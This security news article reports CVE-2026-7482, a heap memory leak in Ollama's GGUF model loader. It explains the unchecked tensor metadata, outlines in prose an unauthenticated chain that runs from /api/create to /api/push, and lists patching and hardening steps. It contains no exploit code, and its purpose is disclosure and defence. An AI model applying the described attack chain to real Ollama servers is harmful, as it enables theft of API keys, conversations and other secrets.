Bleeding Llama: Critical Ollama Vulnerability Exposes Secrets on 300,000 AI Servers

Cyera researchers have disclosed CVE-2026-7482, a critical memory leak in the Ollama framework. A malformed GGUF file allows unauthenticated remote attackers t…

On 2026-05-08, Cyera disclosed CVE-2026-7482, a critical vulnerability in Ollama—a popular framework for local LLM inference—that allows unauthenticated remote attackers to leak a process's entire memory. Dubbed "Bleeding Llama" and assigned a CVSS score of 9.1, the flaw is triggered by uploading a specially crafted GGUF model file to servers that are frequently exposed to the internet without authentication. The discovery challenges the prevailing assumption that running AI models on-premises inherently protects corporate data and secrets.

Key Takeaways

Out-of-bounds read in GGUF loader: Ollama fails to validate tensor dimensions declared in metadata against actual buffer lengths, leading to a heap memory leak during quantization via Go’s unsafe package.
Massive exposure: Cyera estimates that over 300,000 Ollama servers are potentially reachable globally, many of which listen on 0.0.0.0 instead of localhost and lack out-of-the-box authentication.
High-value data at risk: The process heap can contain environment variables, API keys, system prompts, concurrent user conversations, proprietary code, and customer contracts.
Immediate mitigation: Version 0.17.1 addresses the flaw. Administrators should also rotate credentials if their server was exposed and restrict network binding to local or segmented interfaces.

Technical Breakdown: From GGUF Parsing to Memory Exfiltration

The core of the vulnerability lies in the Go-based parser Ollama uses to load GGUF models, specifically within fs/ggml/gguf.go and server/quantization.go. During the quantization pipeline, the WriteTo and ConvertToF32 functions utilize the unsafe package for direct memory buffer access. The loader implicitly trusts the file's internal metadata regarding tensor offset, shape, and size. By crafting a GGUF file where the declared tensor size exceeds the actual data buffer length, an attacker forces the server to read beyond allocated heap boundaries. This reliance on the unsafe package, coupled with a lack of sanity checks, bypasses Go’s memory safety guarantees and enables arbitrary memory reads.

The attack chain is straightforward and requires no authentication. An attacker uploads the malicious file via a simple HTTP POST request. Calling the /api/create endpoint triggers model creation and tensor processing, activating the out-of-bounds read. The leaked memory is then embedded into the resulting model artifact, which can be exfiltrated by pushing it to an attacker-controlled registry via the /api/push endpoint.

Heap Exposure and the Risk of Remote Data Theft

The heap memory in the Ollama process is neither isolated by user session nor cleared between requests. It may house environment variables, API keys, system prompts, fragments of concurrent conversations, proprietary code, and sensitive contracts. Because the Go runtime manages the heap at the process level, sensitive data persists throughout execution and is not isolated between sequential requests. A single remote upload of a "poisoned" model file allows an attacker to dump this material without any active interaction from the victim.

"An attacker can learn basically anything about the organization from your AI inference — API keys, proprietary code, customer contracts, and much more" - Dor Attias, Cyera security researcher

Researchers noted that engineers frequently integrate Ollama with tools like Claude Code, further amplifying the risk. "On top of that, engineers often connect Ollama to tools like Claude Code. In those cases, the impact is even higher—all tool outputs flow to the Ollama server, get saved in the heap, and potentially end up in an attacker's hands." When external tools stream output to the local server, that content resides directly in memory, expanding the potential leak surface far beyond the scope of a single chatbot interaction.

Deployment Vulnerabilities: Why Ollama Instances Are Frequently Exposed

Ollama has become the de facto standard for on-premises LLM deployment, surpassing 171,000 GitHub stars and 100 million downloads on Docker Hub. Despite being designed for local use, the framework provides no native authentication for its REST API and is often configured to listen on 0.0.0.0 rather than localhost. The ease of installation via Docker or automation scripts often leads users to overlook network binding parameters, leaving the service accessible to any IP address that can reach the host. This turns corporate installations into unprotected public endpoints, particularly when containers are deployed on unsegmented internal networks.

While Cyera estimates 300,000 servers are exposed globally, the research does note a limitation: it is unclear how many are reliably exploitable or located on unsegmented internal networks versus the public internet. Nevertheless, the figure represents a significant potential attack surface rather than just a tally of compromised systems.

Mitigation and Remediation

Update to Ollama 0.17.1 immediately. This release contains the fix for the out-of-bounds read in the GGUF loader. Administrators of both internal and external instances should prioritize this upgrade.
Restrict network binding. Configure the service to listen only on localhost or strictly segmented internal interfaces. Avoid the 0.0.0.0 default unless an authenticated reverse proxy is filtering requests.
Rotate credentials and secrets. If an Ollama server was exposed to the internet or an expansive LAN, assume that environment variables and memory-resident secrets may have been compromised. Immediate rotation of API keys, tokens, and credentials is required.
Implement perimeter authentication. Since Ollama lacks native authentication, it is essential to deploy a reverse proxy with strong authentication or a VPN in front of exposed endpoints. Monitor logs for unusual GGUF file uploads to /api/create.

The Fallacy of Implicit On-Premises Security

The discovery of Bleeding Llama dismantles the popular belief that moving data from the cloud to local servers provides inherent protection. When the most popular framework for local AI inference can be compromised by a single poisoned model file, the issue is no longer where the data resides, but the security of the software processing it. The lack of default authentication and the tendency to expose services across all interfaces make on-premises deployments a data breach waiting to happen—unless patching, segmentation, and hardening become core components of the AI stack.

Information has been verified against cited sources and is current as of the time of publication.

Technical Breakdown: From GGUF Parsing to Memory Exfiltration

Heap Exposure and the Risk of Remote Data Theft

Deployment Vulnerabilities: Why Ollama Instances Are Frequently Exposed

Mitigation and Remediation

The Fallacy of Implicit On-Premises Security

Sources